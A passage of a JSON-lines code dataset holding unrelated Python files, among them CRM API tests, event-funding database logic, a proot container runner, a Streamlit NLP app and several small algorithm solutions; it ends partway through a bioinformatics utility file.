i.create('projects', {'PROJECT_NAME':'Foo Corporation','STATUS':'Not Started'})\n if project is not None:\n project_id = project['PROJECT_ID']\n project['PROJECT_NAME']='Barzle Corporation'\n project = i.update('projects', project)\n i.upload_image('projects', project_id, 'apollo17.jpg')\n i.delete('projects', project_id, sub_type='image')\n i.create_child('projects', project_id, 'tags', {'TAG_NAME':'foo'})\n i.delete('projects', project_id, sub_type='tags', sub_type_id='foo')\n notes = i.read('projects', project_id, sub_type='notes')\n i.create_child('projects', project_id, 'notes', {'TITLE':'Foo','BODY':'This is the body'})\n events = i.read('projects', project_id, sub_type='events')\n file_attachments = i.read('projects', project_id, sub_type='fileattachments')\n i.create_child('projects', project_id, 'follow', {})\n i.delete('projects', project_id, sub_type='follow')\n milestones = i.read('projects', project_id, sub_type='milestones')\n tasks = i.read('projects', project_id, sub_type='tasks')\n emails = i.read('projects', project_id, sub_type='emails')\n email = i.read('projects', project_id, sub_type='linkemailaddress')\n i.delete('projects', project_id, sub_type='pipeline')\n i.delete('projects', project_id)\n relationships = i.read('relationships')\n tags = i.read('tags?record_type=contacts')\n task_categories = i.read('taskcategories')\n tasks = i.read('tasks')\n if tasks is not None:\n task_id = tasks[0]['TASK_ID']\n task = i.read('tasks', task_id)\n users = i.read('users')\n if users is not None:\n user_id = users[0]['USER_ID']\n user = i.read('users', user_id)\n else:\n user_id = None\n me = i.read('users/me')\n if user_id is not None:\n task = i.create('tasks', {'TITLE':'Test','STATUS':'Not Started','COMPLETED':'False','PUBLICLY_VISIBLE':'True','RESPONSIBLE_USER_ID':str(user_id)})\n if task is not None:\n task['TITLE'] = task['TITLE'] + 'foo'\n task_id = task['TASK_ID']\n task = i.update('tasks', task)\n i.create_child('tasks', task_id, 'follow', {})\n i.delete('tasks', task_id, sub_type='follow')\n comments = i.read('tasks', task_id, sub_type='comments')\n i.delete('tasks', task_id)\n team_members = i.read('teammembers')\n if team_members is not None:\n team_member_id = team_members[0]['PERMISSION_ID']\n team_member = i.read('teammembers', team_member_id)\n \n teams = i.read('teams')\n if teams is not None:\n team_id = teams[0]['TEAM_ID']\n team = i.read('teams', team_id)\n team = i.create('teams',{'TEAM_NAME':'Team Foo','ANONYMOUS_TEAM':'False'})\n if team is not None:\n team_id = team['TEAM_ID']\n team['TEAM_NAME'] = 'Team Bar'\n team = i.update('teams', team)\n i.delete('teams', team_id)\n \n #\n # Next, create a few objects, add links between them, and then delete them\n #\n \n contact_id = None\n organisation_id = None\n project_id = None\n opportunity_id = None\n \n contact = i.create('contacts',{'FIRST_NAME':'Foo','LAST_NAME':'Bar'})\n if contact is not None:\n contact_id = contact['CONTACT_ID']\n organisation = i.create('organisations',{'ORGANISATION_NAME':'Foo Corporation'})\n if organisation is not None:\n organisation_id = organisation['ORGANISATION_ID']\n project = i.create('projects',{'PROJECT_NAME':'Foo Corporation','Status':'Not Started'})\n if project is not None:\n project_id = project['PROJECT_ID']\n opportunity = i.create('opportunities',{'OPPORTUNITY_NAME':'Foo Corporation','OPPORTUNITY_STATE':'Open'})\n if opportunity is not None:\n opportunity_id = opportunity['OPPORTUNITY_ID']\n \n contact = i.create_child('contacts', contact_id, 'links', {'ORGANISATION_ID':organisation_id})\n organisation = i.create_child('organisations', organisation_id, 'links', {'PROJECT_ID':project_id})\n project = i.create_child('projects', project_id, 'links', {'ORGANISATION_ID':organisation_id})\n opportunity = i.create_child('opportunities', opportunity_id, 'links', {'CONTACT_ID':contact_id})\n \n if contact_id is not None:\n i.delete('contacts', contact_id)\n if organisation_id is not None:\n i.delete('organisations', organisation_id)\n if project_id is not None:\n i.delete('projects', project_id)\n if opportunity_id is not None:\n i.delete('opportunities', opportunity_id)\n \n print(str(i.tests_passed) + ' out of ' + str(i.tests_run) + ' passed')\n if len(i.test_failures) > 0:\n print ('')\n print ('Test Failures')\n for f in i.test_failures:\n print (f)","sub_path":"insightlytest.py","file_name":"insightlytest.py","file_ext":"py","file_size_in_byte":17384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"602972039","text":"from database import db\nfrom database.models import Event, Tag, Report, User, Funded, VotedTest\nfrom datetime import datetime\nimport pytz\n\nutc = pytz.UTC\n\n\ndef add_event(data, user_creator):\n name = data.get('name')\n description = data.get('description')\n funding_start_date = datetime.strptime(data.get('funding_start_date'), \"%Y-%m-%dT%H:%M:%S.%fZ\").replace(tzinfo=utc)\n funding_end_date = datetime.strptime(data.get('funding_end_date'), \"%Y-%m-%dT%H:%M:%S.%fZ\").replace(tzinfo=utc)\n goal = data.get('goal')\n event_start_date = datetime.strptime(data.get('event_start_date'), \"%Y-%m-%dT%H:%M:%S.%fZ\").replace(tzinfo=utc)\n event_end_date = datetime.strptime(data.get('event_end_date'), \"%Y-%m-%dT%H:%M:%S.%fZ\").replace(tzinfo=utc)\n location = data.get('location')\n latitude = data.get('lat')\n if latitude is None:\n latitude = 0.000\n longitude = data.get('long')\n if longitude is None:\n longitude = 0.00\n tags = data.get('tags')\n photo = data.get('photo')\n\n if (funding_start_date < utc.localize(datetime.now())):\n raise Exception(\"The event funding date can not start in the past\")\n if (funding_end_date < utc.localize(datetime.now())):\n raise Exception(\"The event funding date can not end in the past\")\n if (funding_start_date > funding_end_date):\n raise Exception(\"Start funding date is after end funding date\")\n if (event_start_date < utc.localize(datetime.now())):\n raise Exception(\"The event can not start in the past\")\n if (event_end_date < utc.localize(datetime.now())):\n raise Exception(\"The event can not end in the past\")\n if (event_start_date > event_end_date):\n raise Exception(\"Start date is after end date\")\n\n new_event = Event(name, description, funding_start_date, funding_end_date, goal, event_start_date, event_end_date,\n location, user_creator, latitude, longitude, photo)\n\n for tag in tags:\n new_tag = Tag(tag)\n new_event.tags.append(new_tag)\n\n db.session.add(new_event)\n db.session.commit()\n\n return new_event.id\n\n\ndef update_event(id, data):\n event = Event.query.get(id)\n event.description = data.get('description')\n event.location = data.get('location')\n event.photo = data.get('photo')\n\n funding_end_date = datetime.strptime(data.get('funding_end_date'), \"%Y-%m-%dT%H:%M:%S.%fZ\").replace(tzinfo=utc)\n event_start_date = datetime.strptime(data.get('event_start_date'), \"%Y-%m-%dT%H:%M:%S.%fZ\").replace(tzinfo=utc)\n event_end_date = datetime.strptime(data.get('event_end_date'), \"%Y-%m-%dT%H:%M:%S.%fZ\").replace(tzinfo=utc)\n\n event.lat = data.get('lat')\n event.long = data.get('long')\n\n if (event_start_date > event_end_date):\n raise Exception(\"Start date is after end date\")\n\n event.event_end_date = event_end_date\n event.event_start_date = event_start_date\n event.funding_end_date = funding_end_date\n\n db.session.add(event)\n db.session.commit()\n\n\ndef delete_event(id):\n event = Event.query.get(id)\n db.session.delete(event)\n db.session.commit()\n return event\n\n\ndef add_report(data, user_id):\n event_id = data.get('event_id')\n content = data.get('content')\n\n new_report = Report(user_id, event_id, content)\n\n db.session.add(new_report)\n db.session.commit()\n\n return new_report.id\n\n\ndef delete_report(id):\n report = Report.query.get(id)\n db.session.delete(report)\n db.session.commit()\n return report\n\n\ndef watch_event(id, data, user_id):\n event = Event.query.get(id)\n user = User.query.get(user_id)\n\n if user in event.watchers:\n event.watchers.remove(user)\n else:\n event.watchers.append(user)\n\n db.session.commit()\n\n\ndef fund_event(id, data, user_id):\n event = Event.query.get(id)\n user = User.query.get(user_id)\n\n test = Funded(fund_amount=data.get('fund_amount'))\n\n test.backed = user\n test.backers = event\n\n event.backers.append(test)\n db.session.commit()\n\n\ndef vote_event(id, data, user_id):\n\n event = Event.query.get(id)\n user = User.query.get(user_id)\n\n test = VotedTest(stars=data.get('stars'))\n\n test.voted = user\n test.votes = event\n\n event.votes.append(test)\n db.session.commit()\n\n\ndef get_info_events(events):\n\n if type(events) != list:\n user = User.query.filter(User.id == events.user_creator).one()\n events.__dict__['user_creator_name'] = user.name\n return events\n\n result = []\n for event in events:\n user = User.query.filter(User.id == event.user_creator).one()\n event.__dict__['user_creator_name'] = user.name\n result.append(event)\n\n return result\n","sub_path":"api/events/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"554259161","text":"import logging\n\nimport SMS.config\n\nCONF = SMS.config.CONF\n\n\ndef get_logger():\n return logging.getLogger('SMS')\n\n\ndef configure_logging():\n log_level = logging.DEBUG if CONF.log.debug else logging.INFO\n formatter = logging.Formatter(CONF.log.log_format)\n\n logger = get_logger()\n logger.setLevel(log_level)\n\n def add_handler(h):\n h.setFormatter(formatter)\n h.setLevel(log_level)\n logger.addHandler(h)\n\n if CONF.log.console_log:\n handler = logging.StreamHandler()\n add_handler(handler)\n\n if CONF.log.log_file:\n handler = logging.FileHandler(CONF.log.log_file)\n add_handler(handler)\n","sub_path":"SMS/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"383887451","text":"import argparse\nimport json\n\n\ndef parse_template(template, **template_values):\n print(\">>>>\", template.format(**template_values))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--settings\")\n\n args = parser.parse_args()\n config = json.loads(args.settings)\n template = config.get(\"template\")\n template_values = config.get(\"template_values\")\n\n parse_template(template, **template_values)\n\n\n\"\"\"\n------- command ---------\n{\"template\":\"{bucket}/{prefix}/{database}/{schema}\",\"template_values\":{\"bucket\":\"eda0x7b2263-sbx-eu-west-1\",\"prefix\":\"breaking20\",\"database\":\"DTC_BI_DM\",\"schema\":\"dbo\"}}\n\npython3 templating.py --settings '{\"template\":\"{bucket}/{prefix}/{database}/{schema}\",\"template_values\":{\"bucket\":\"eda0x7b2263-sbx-eu-west-1\",\"prefix\":\"breaking20\",\"database\":\"DTC_BI_DM\",\"schema\":\"dbo\"}}'\n \n\n========== example ======\ntemplate = \"Hello, my name is {name}, today is {date} and the weather is {weather}\"\nfields = {'name': 'Michael', 'date': '21/06/2015', 'weather': 'sunny'}\ntemplate.format(**fields)\n\"\"\"\n","sub_path":"Python/playground/templating.py","file_name":"templating.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"10124375","text":"# - * - coding:utf8 - * - -\n###########################################\n# Author: Tinkle\n# E-mail: shutingnupt@gmail.com\n# Name: Climbing Stairs.py\n# Creation Time: 2017/7/10\n###########################################\n'''\nYou are climbing a stair case. It takes n steps to reach to the top.\n\nEach time you can either climb 1 or 2 steps. In how many distinct ways can you climb to the top?\n'''\nclass Solution(object):\n def climbStairs(self, n):\n #s[n]=s[n-1]+s[n-2]\n if n==1 or n==2:\n return n\n i=3;s=[1,2]\n while(i<=n):\n s.append(s[i-2]+s[i-3])\n i=i+1\n return s.pop()","sub_path":"DynamicProgramming/70. Climbing Stairs.py","file_name":"70. Climbing Stairs.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"634369171","text":"#!/usr/bin/python\n\n\nfrom django.template import loader, Context\nfrom yapsy.IPlugin import IPlugin\n\nfrom server.models import PluginScriptRow\n\n\nclass ARDInfo(IPlugin):\n name = \"ARD Info\"\n\n def widget_width(self):\n return 4\n\n def plugin_type(self):\n return 'machine_detail'\n\n def get_description(self):\n return \"Apple Remote Desktop's Computer Information Fields\"\n\n def widget_content(self, page, machine=None, theid=None):\n template = loader.get_template(\n \"machine_detail_ard_info/templates/ard_info.html\")\n\n ard_info = {}\n\n for i in xrange(1, 5):\n key = 'ARD_Info_{}'.format(i)\n row = PluginScriptRow.objects.filter(\n submission__machine=machine,\n submission__plugin='ARD_Info',\n pluginscript_name=key)\n\n try:\n val = row.first().pluginscript_data\n except Exception:\n val = \"\"\n ard_info[key] = val\n\n c = Context({\n \"title\": self.get_description(),\n \"data\": ard_info,\n \"theid\": theid,\n \"page\": page})\n\n return template.render(c)\n","sub_path":"server/plugins/machine_detail_ard_info/ard_info.py","file_name":"ard_info.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"120805198","text":"import h5py\nimport numpy as np\nfrom progressbar import ProgressBar\n\nfrom utils import DBI, get_target_collection, get_related_list\n\nrelated_db = DBI().articles_related\narticles_db = DBI().articles\n\nvalid_index = set([doc['index'] for doc in articles_db.find({'target': False},\n {'index': 1})])\norder_valid = {index: i for i, index in enumerate(sorted(list(valid_index)))}\ntarget_index = set([doc['index'] for doc in articles_db.find({'target': True},\n {'index': 1})])\n\nprint(len(valid_index))\n\nf = h5py.File('data_0626/features_y_ndcg_1.hdf5', 'w')\npbar = ProgressBar(max_value=2000)\nfor index in target_index:\n doc = related_db.find_one({'index': index})\n related = get_related_list(doc['related'], 10, valid_index)\n arr = np.empty((len(valid_index), ))\n arr.fill(np.inf)\n for hop in range(10, 0, -1):\n slice = [order_valid[i] for i in related[hop]]\n arr[slice] = hop\n f.create_dataset(str(doc['index']), data=arr, dtype='i8', compression=\"gzip\")\n pbar.update(pbar.value + 1)\npbar.finish()\nf.flush()\nf.close()\n","sub_path":"source/generate_label_nDCG.py","file_name":"generate_label_nDCG.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"45268012","text":"# ChivTeams Plugin for BigBrotherBot(B3) (www.bigbrotherbot.net)\n# Copyright (C) 2015 ph03n1x\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n__version__ = '1.0.0'\n__author__ = 'ph03n1x'\n\nimport b3\nimport b3.events\nimport b3.plugin\n\nclass ChivteamsPlugin(b3.plugin.Plugin):\n requiresParsers = ['chiv']\n\n def onStartup(self):\n #register events\n self.registerEvent('EVT_CLIENT_JOIN', self.onJoin)\n\n #########################################################################################\n # EVENT HANDLING #\n #########################################################################################\n def onJoin(self, event):\n \"\"\"\\\n Handle EVT_CLIENT_JOIN\n \"\"\"\n sclient = event.client\n if sclient.maxLevel >= 20 and sclient.maxLevel != 100:\n if sclient.team == b3.TEAM_SPEC:\n self.debug('%s is spectating. Ignoring their team' % sclient.name)\n elif sclient.team == b3.TEAM_BLUE:\n self.info('Forcing %s to red team' % sclient.name)\n self.console.write('AdminChangeTeam %s' % sclient.name)\n sclient.message('^3You can only play on ^1RED ^3team')\n","sub_path":"chivteams.py","file_name":"chivteams.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"481215999","text":"import unittest\nimport sys\n\nmodule = sys.argv[-1].split(\".py\")[0]\n\nclass PublicTests(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n global devedores\n undertest = __import__(module)\n devedores = getattr(undertest, 'devedores', None)\n\n def test_1_vazio(self):\n contas = { 'Ana':1000, 'Antonio':-500, 'William':0, 'Carlos':2500, 'Kate':-1300 }\n assert devedores(contas) == 2\n\nif __name__ == '__main__':\n loader = unittest.TestLoader()\n runner = unittest.TextTestRunner()\n runner.run(loader.loadTestsFromModule(sys.modules[__name__]))\n","sub_path":"atividades/mini_testes/devedores/public_tests.py","file_name":"public_tests.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"377297672","text":"# /psqtraviscontainer/use.py\n#\n# Module which handles the running of scripts and commands inside of a proot\n#\n# See LICENCE.md for Copyright information\n\"\"\" Module which handles the running of scripts inside of a proot.\"\"\"\n\nimport os\n\nimport platform\n\nimport subprocess\n\nimport sys\n\nfrom collections import namedtuple\n\nfrom psqtraviscontainer import architecture\nfrom psqtraviscontainer import common_options\nfrom psqtraviscontainer import constants\nfrom psqtraviscontainer import distro\n\nProotDistribution = namedtuple(\"ProotDistribution\", \"proot qemu\")\n\n\nclass PtraceRootExecutor(object):\n\n \"\"\"For a distro configured a in container, a mechanism to execute code.\"\"\"\n\n def __init__(self, proot_distro, container_root, config, arch):\n \"\"\"Initialize PtraceRootExecutor for container and distro.\"\"\"\n super(PtraceRootExecutor, self).__init__()\n self._proot_distro = proot_distro\n self._container_root = container_root\n self._config = config\n self._arch = arch\n\n def _execute_argv(self, user_argv):\n \"\"\"Get argv to pass to subprocess later.\"\"\"\n distro_dir = distro.get_dir(self._container_root,\n self._config,\n self._arch)\n proot_command = [self._proot_distro.proot(), \"-S\", distro_dir]\n\n # If we're not the same architecture, interpose qemu's emulator\n # for the target architecture as appropriate\n our_architecture = architecture.Alias.universal(platform.machine())\n target_architecture = architecture.Alias.universal(self._arch)\n\n if our_architecture != target_architecture:\n proot_command += [\"-q\", self._proot_distro.qemu(self._arch)]\n\n return proot_command + user_argv\n\n def execute(self, argv, stdout=None, stderr=None):\n \"\"\"Execute the command specified by argv.\n\n Return tuple of (exit status, stdout, stderr).\n \"\"\"\n argv = self._execute_argv(argv)\n executed_cmd = subprocess.Popen(argv,\n stdout=stdout,\n stderr=stderr,\n universal_newlines=True)\n stdout_data, stderr_data = executed_cmd.communicate()\n\n return (executed_cmd.returncode, stdout_data, stderr_data)\n\n def execute_success(self, argv):\n \"\"\"Execute the command specified by argv, throws on failure.\"\"\"\n returncode, stdout_data, stderr_data = self.execute(argv,\n subprocess.PIPE,\n subprocess.PIPE)\n\n if returncode != 0:\n sys.stderr.write(stdout_data)\n sys.stderr.write(stderr_data)\n raise RuntimeError(\"{0} failed with {1}\".format(\" \".join(argv),\n returncode))\n\n\ndef proot_distro_from_container(container_dir):\n \"\"\"Return a ProotDistribution from a container dir.\"\"\"\n path_to_proot_dir = constants.proot_distribution_dir(container_dir)\n path_to_proot_bin = os.path.join(path_to_proot_dir, \"bin/proot\")\n path_to_qemu_template = os.path.join(path_to_proot_dir,\n \"bin/qemu-{arch}\")\n\n def _get_qemu_binary(arch):\n \"\"\"Get the qemu binary for architecture.\"\"\"\n qemu_arch = architecture.Alias.qemu(arch)\n return path_to_qemu_template.format(arch=qemu_arch)\n\n def _get_proot_binary():\n \"\"\"Get the proot binary.\"\"\"\n return path_to_proot_bin\n\n return ProotDistribution(proot=_get_proot_binary,\n qemu=_get_qemu_binary)\n\n\ndef _parse_arguments(arguments=None):\n \"\"\"Return a parser context result.\"\"\"\n parser = common_options.get_parser(\"Use\")\n parser.add_argument(\"--cmd\",\n nargs=\"*\",\n help=\"Command to run inside of container\",\n default=None,\n required=True)\n return parser.parse_args(arguments)\n\n\ndef _check_if_exists(entity):\n \"\"\"Raise RuntimeError if entity does not exist.\"\"\"\n if not os.path.exists(entity):\n raise RuntimeError(\"A required entity {0} does not exist\\n\"\n \"Try running psq-travis-container-create \"\n \"first before using psq-travis-container-use.\")\n\n\ndef main(arguments=None):\n \"\"\"Select a distro in the container root and runs a comamnd in it.\"\"\"\n result = _parse_arguments(arguments=arguments)\n distro_config, arch = distro.lookup(result.distro[0],\n result.release[0],\n result.arch[0])\n required_entities = [\n constants.have_proot_distribution(result.containerdir[0]),\n distro.get_dir(result.containerdir[0], distro_config, arch)\n ]\n\n for entity in required_entities:\n _check_if_exists(entity)\n\n # Now create an executor and run our command\n proot_distro = proot_distro_from_container(result.containerdir[0])\n proot_executor = PtraceRootExecutor(proot_distro,\n result.containerdir[0],\n distro_config,\n arch)\n\n return proot_executor.execute(result.cmd)[0]\n","sub_path":"psqtraviscontainer/use.py","file_name":"use.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"612395757","text":"class Test:\n def takeInput(self):\n myText =input(\"enter the string\")\n return myText\n\n def reversTxt(self, msg):\n take=msg.split(\" \")\n take.reverse()\n print(\" \".join(take))\n\n\ntest = Test()\nword = test.takeInput()\ntest.reversTxt(word)\n","sub_path":"Q12Susheel.py","file_name":"Q12Susheel.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"180765115","text":"import streamlit as st\n\n\n#NLP Pakages\nimport spacy\nfrom textblob import TextBlob\nfrom gensim.summarization import summarize\n\n#Sumy Packages\nfrom sumy.parsers.plaintext import PlaintextParser\nfrom sumy.nlp.tokenizers import Tokenizer\nfrom sumy.summarizers.lex_rank import LexRankSummarizer\nimport nltk\nnltk.download('punkt')\n\n#Summary Function\ndef sumy_summarizer(docx):\n\tparser=PlaintextParser.from_string(docx,Tokenizer(\"english\"))\n\tlex_summarizer=LexRankSummarizer()\n\tsummary=lex_summarizer(parser.document,3)\n\tsummary_list=[str(sentence) for sentence in summary]\n\tresult=' '.join(summary_list)\n\treturn result\n\ndef text_analyzer(my_text):\n\tnlp=spacy.load(\"en_core_web_sm\")\n\tdocx=nlp(my_text)\n\n\ttokens=[token.text for token in docx]\n\tallData=[('\"Tokens\":{},\\n\"Lemma\":{}'.format(token.text,token.lemma_)) for token in docx]\n\treturn allData\n\ndef entity_analyzer(my_text):\n\tnlp=spacy.load(\"en_core_web_sm\")\n\tdocx=nlp(my_text)\n\ttokens=[token.text for token in docx]\n\tentities=[(entity.text,entity.label_) for entity in docx.ents]\n\tdata=[('\"Token\":{}, \\n\"Entity\":{}'.format(tokens,entities))]\n\treturn data\t\n\n\n#@st.cache\ndef main():\n\t### NLP App with Streamlit ###\n\tst.title(\"NLPiffy Streamlit\")\n\tst.subheader(\"Natural Language Processing On A Go...\")\n\n\t#Tokenization\n\tif st.checkbox(\"Shaw Named Entities\"):\n\t\tst.subheader(\"Extract Entities from Your Text\")\n\t\tmessage1=st.text_area(\"Enter Your Text\",\"Type Here\")\n\t\tif st.button(\"Extract\"):\n\t\t\tnlp_result=entity_analyzer(message1)\n\t\t\tst.json(nlp_result)\n\n\n\t#Name Entity Recognition\n\tif st.checkbox(\"Show Tokens And Lemma\"):\n\t\tst.subheader(\"Tokenize Your Text\")\n\t\tmessage2= st.text_area(\"Enter Your Text\",\"Type Here\")\n\t\tif st.button(\"Analyze\"):\n\t\t\tnlp_result=text_analyzer(message)\n\t\t\tst.json(nlp_result)\n\n\t#Sentiment Analysis\n\tif st.checkbox(\"Show Sentiment Analysis\"):\n\t\tst.subheader(\"Sentiment Of Your Text\")\n\t\tmessage3= st.text_area(\"Enter Your Text\",\"Type Here\")\n\t\tif st.button(\"Analyze\"):\n\t\t\tblob=TextBlob(message3)\n\t\t\tresult_sentiment=blob.sentiment\n\t\t\tst.success(result_sentiment)\n\t\t\t\n\n\n\t#Text Summarization\n\tif st.checkbox(\"Show Text Summarization\"):\n\t\tst.subheader(\"Summarize Your Text\")\n\t\tmessage3= st.text_area(\"Enter Your Text\",\"Type Here\")\n\t\tsummary_options=st.selectbox(\"Choose Your Summarize\",(\"gensim\",\"sumy\"))\n\t\tif st.button(\"Summarize\"):\n\t\t\tif summary_options=='gensim':\n\t\t\t\tsummary_result=summarize(message3)\n\t\t\telif summary_options=='sumy':\n\t\t\t\tst.text(\"Using Sumy...\")\n\t\t\t\tsummary_result=sumy_summarizer(message3)\n\n\t\t\telse:\n\t\t\t\tst.warning(\"Using Default Summarizer\")\n\t\t\t\tst.text(\"Using Gensim...\")\n\t\t\t\tsummary_result=summarize(message3)\n\n\t\t\tst.success(summary_result)\t\n\n\tst.sidebar.subheader(\"About the App\")\n\tst.sidebar.text(\"NLPiffy App with Streamlit\")\n\tst.sidebar.info(\"Cudos to Streamlit Team\")\n\n\nif __name__ == '__main__':\n\tmain()\n\t\t\t\n\t\t\t\n\n\n\n\n\n\n\n\t","sub_path":"nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"392790859","text":"import numpy as np \nimport pandas as pd # 可視化の際に便利\nfrom IPython.display import display # 可視化に利用\nimport sys # プログラムの終了に利用\n\n# 52枚のトランプを作成する関数\ndef make_cards52():\n suit=np.array([\"♠\",\"♡\",\"♦\",\"♣\"],dtype=\"object\") # ♠,♡,♦,♣の4つのマーク\n number=[\"{:02d}\".format(i) for i in range(1,14)] # 1-13の13個の数字\n \n # 52枚のカードを生成\n s=np.repeat(suit,13) # 52個のマーク \n n=np.array(number*4,dtype=\"object\") # 52個の数字\n cards52=s+n # 52個の[マーク,数字]の組み合わせ\n \n return cards52\n\n# 21枚のカードを選択する関数\ndef choose_cards21(cards52):\n cards21=cards52[np.random.choice(np.arange(52),21,replace=False)] # 21枚をランダムに非復元的に選択\n \n return cards21\n\n# カードを並び替える関数\ndef sort_cards21(cards21,column_chosen):\n cards21_matrix=cards21.reshape(7,3) # 7行3列の行列を作成\n \n nc=(column_chosen-1)%3 # ユーザーの選択した列\n numlist=[i for i in range(3)] # 1-3列目のリスト\n nf,nb=list(set(numlist)-set([nc])) # ユーザーの選択しなかった2列\n \n cf=cards21_matrix[:,nf] # まとめる際、前となる列\n cc=cards21_matrix[:,nc] # まとめる際、真ん中となる列\n cb=cards21_matrix[:,nb] # まとめる際、後ろとなる列 \n \n cards21_sorted=np.concatenate([cf,cc,cb]) # 前、真ん中、後ろをまとめる\n \n return cards21_sorted\n\n# カードを表示\ndef display_cards(cards21):\n display(pd.DataFrame(cards21.reshape(7,3),columns=[\"列1\",\"列2\",\"列3\"])) # 7行3列の行列を表示\n \n# 入力された値が1-3かどうかを確認し、値をintに変換\ndef validate_input(i):\n # 正しい形式の値が入力されるまで繰り返し\n while True:\n column_chosen=input(\"{}回目: 選んだカードは何列目にありますか。1-3の数字で入力してください: \".format(i+1)) # 何列目かの入力値\n \n if column_chosen in [\"1\",\"2\",\"3\"]: # 正しく1-3の値が入力されたら、str型の入力をintに変換\n return int(column_chosen)\n else: # 正しく入力されなかったら、エラーメッセージを表示\n print(\"Error: 1-3の数値を入力してください。\") \n\n# 答えを確認\ndef validate_answer(cards21):\n while True: # 正しい形式の値が入力されるまで繰り返し\n answer=input(\"あなたが選んだのは、{}ですね? [yes or no] : \".format(cards21[10])) # 入力値\n \n if answer in [\"yes\",\"no\"]: # yes,noが入力されたら\n if answer==\"yes\": # yesの場合\n return print(\"でしょ。[end]\")\n elif answer==\"no\": # noの場合\n print(\"そんなことはない。あなたが間違えています。最初からやり直してください。 [end]\")\n sys.exit()\n else: # yes,no以外が入力されたら\n print(\"'yes'もしくは'no'で回答してください。\")\n\n# main関数\ndef main():\n cards52=make_cards52() # 52枚のカードを作成\n cards21=choose_cards21(cards52) # 21枚のカードを選択\n\n display_cards(cards21) # 表示する\n print(\"好きなカードを上から1枚選んでください。忘れないでくださいね。\")\n\n # 3回繰り返す\n for i in range(3):\n column_chosen=validate_input(i) # ユーザーの選択した列\n cards21=sort_cards21(cards21,column_chosen) # カードをソート\n display_cards(cards21) # 21枚のカードを表示\n \n validate_answer(cards21) # 答えてもらう\n \n# 実行\nif __name__==\"__main__\":\n main()","sub_path":"card_trick21/21-card_trick.py","file_name":"21-card_trick.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"97201711","text":"\"\"\"\nGiven an array nums and a target value k, find the maximum length of a subarray that sums to k.\nIf there isn't one, return 0 instead.\n\nNote:\nThe sum of the entire nums array is guaranteed to fit within the 32-bit signed integer range.\n\nExample 1:\nInput: nums = [1, -1, 5, -2, 3], k = 3\nOutput: 4\nExplanation: The subarray [1, -1, 5, -2] sums to 3 and is the longest.\n\nExample 2:\nInput: nums = [-2, -1, 2, 1], k = 1\nOutput: 2\nExplanation: The subarray [-1, 2] sums to 1 and is the longest.\n\nFollow Up:\nCan you do it in O(n) time?\n\"\"\"\nclass Solution:\n def maxSubArrayLen(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n n = len(nums)\n presum = dict()\n ret = 0\n total = 0\n for i,num in enumerate(nums):\n total += num\n if total==k:\n ret = max(ret, i+1)\n elif total-k in presum:\n ret = max(ret, i-presum[total-k])\n if total not in presum:\n presum[total] = i\n return ret \n","sub_path":"MaximumSizeSubarraySumEqualsk.py","file_name":"MaximumSizeSubarraySumEqualsk.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"475525953","text":"from babel.babel_utils import glom, write_compendium, dump_sets, dump_dicts, get_prefixes, filter_out_non_unique_ids, clean_sets\nfrom babel.onto import Onto\nfrom babel.ubergraph import UberGraph\nfrom src.util import Text\nimport os\nfrom datetime import datetime as dt\nfrom functools import reduce\nfrom ast import literal_eval\nfrom collections import defaultdict\n\n#def write_dicts(dicts,fname):\n# with open(fname,'w') as outf:\n# for k in dicts:\n# outf.write(f'{k}\\t{dicts[k]}\\n')\n\ndef read_bad_hp_mappings():\n fn = os.path.join(os.path.dirname(os.path.abspath(__file__)),'input_data','hpo_errors.txt')\n drops = defaultdict(set)\n with open(fn,'r') as infile:\n for line in infile:\n if line.startswith('-'):\n continue\n x = line.strip().split('\\t')\n hps = x[0]\n commaindex = hps.index(',')\n curie = hps[1:commaindex]\n name = hps[commaindex+1:-1]\n badset = literal_eval(x[1])\n drops[curie].update(badset)\n return drops\n\ndef 